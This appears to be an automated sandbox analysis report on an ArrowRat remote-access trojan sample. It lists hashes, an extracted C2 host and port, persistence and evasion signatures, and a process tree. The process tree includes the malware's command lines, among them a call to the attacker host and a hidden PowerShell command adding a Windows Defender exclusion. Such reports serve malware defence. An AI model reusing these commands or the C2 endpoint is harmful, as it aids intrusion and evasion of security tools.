Overview

overview

10

Static

static

10

0x00090000...61.exe

windows7-x64

10

0x00090000...61.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-07-2023 20:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0x0009000000012029-61.exe

  • Size

    158KB

  • MD5

    d7dea9816b882cb53d615a3afdf0c955

  • SHA1

    d3bfd91ff74c072028bd747d4f56f17cc55168a5

  • SHA256

    96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6

  • SHA512

    b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35

  • SSDEEP

    3072:5bzgH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfP/NO8Y:5bzge0ODhTEPgnjuIJzo+PPcfP/A8

Score
10/10
arrowratclientpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

line-ellis.gl.at.ply.gg:10735

Mutex

nAChhjAnR

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0x0009000000012029-61.exe
    "C:\Users\Admin\AppData\Local\Temp\0x0009000000012029-61.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4408
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1944
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR
      2⤵
        PID:4556
      • C:\Windows\System32\ComputerDefaults.exe
        "C:\Windows\System32\ComputerDefaults.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:812
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LHost\hDvkdxlbo.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2452
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3240
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4720
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 4720 -s 3980
        2⤵
        • Program crash
        PID:3640
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -pss -s 408 -p 4720 -ip 4720
      1⤵
        PID:1372
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:4968
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 4968 -s 3984
          2⤵
          • Program crash
          PID:4000
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -pss -s 448 -p 4968 -ip 4968
        1⤵
          PID:4120
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
          • Modifies registry class
          PID:1352

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml
          Filesize

          97B

          MD5

          75fdba27ae111f9312c9b243a5e22d02

          SHA1

          0bbbf13546b05600dbeb285609adcff5e12c2e24

          SHA256

          62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89

          SHA512

          855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0u44eusu.nnv.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\temp0923
          Filesize

          10B

          MD5

          7108d8f20ce53175104125c506d0ab72

          SHA1

          4ea1171e43f4dbc42ee05fc55e854554ff447a14

          SHA256

          ca29356e1e5572aa0f894e58e7a8af7627e553e90613cb47617309c0fb2a6f20

          SHA512

          18ae930cea3801568c5ccb66a53bcb116a6fd5c2b913c72ffc9870253ef652eee4e3c53a8a627cdca06d743b8d74e676c78db3174b54a852a96ebfbeecf91e12

          Download Submit

        • memory/1352-214-0x0000016A9A3A0000-0x0000016A9A3A8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1944-173-0x0000000003650000-0x0000000003651000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2452-162-0x00000256ED800000-0x00000256ED810000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2452-172-0x00007FFC5C950000-0x00007FFC5D411000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2452-168-0x00000256ED800000-0x00000256ED810000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2452-159-0x00007FFC5C950000-0x00007FFC5D411000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2452-163-0x00000256ED800000-0x00000256ED810000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2452-158-0x00000256ED070000-0x00000256ED092000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2452-164-0x00000256ED800000-0x00000256ED810000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4408-140-0x000001FE41C80000-0x000001FE41C90000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4408-191-0x000001FE41C80000-0x000001FE41C90000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4408-133-0x000001FE3FEE0000-0x000001FE3FF0E000-memory.dmp

          Filesize

          184KB

          Download

        • memory/4408-135-0x00007FFC5C950000-0x00007FFC5D411000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4408-167-0x00007FFC5C950000-0x00007FFC5D411000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4556-142-0x0000000005F50000-0x00000000064F4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/4556-138-0x00000000054F0000-0x0000000005582000-memory.dmp

          Filesize

          584KB

          Download

        • memory/4556-143-0x0000000005D10000-0x0000000005D76000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4556-141-0x00000000057E0000-0x00000000057F0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4556-134-0x0000000000400000-0x0000000000418000-memory.dmp

          Filesize

          96KB

          Download

        • memory/4556-146-0x0000000006600000-0x0000000006650000-memory.dmp

          Filesize

          320KB

          Download

        • memory/4556-183-0x00000000744D0000-0x0000000074C80000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/4556-137-0x00000000744D0000-0x0000000074C80000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/4556-139-0x00000000055F0000-0x000000000568C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/4720-182-0x000002360CE60000-0x000002360CE80000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4720-185-0x000002360D280000-0x000002360D2A0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4720-179-0x000002360CEA0000-0x000002360CEC0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4968-199-0x00000285B0CD0000-0x00000285B0CF0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4968-203-0x00000285B0C90000-0x00000285B0CB0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4968-205-0x00000285B10A0000-0x00000285B10C0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4968-209-0x00000285C1650000-0x00000285C1670000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4968-210-0x0000027DAE600000-0x0000027DAE82E000-memory.dmp

          Filesize

          2.2MB

          Download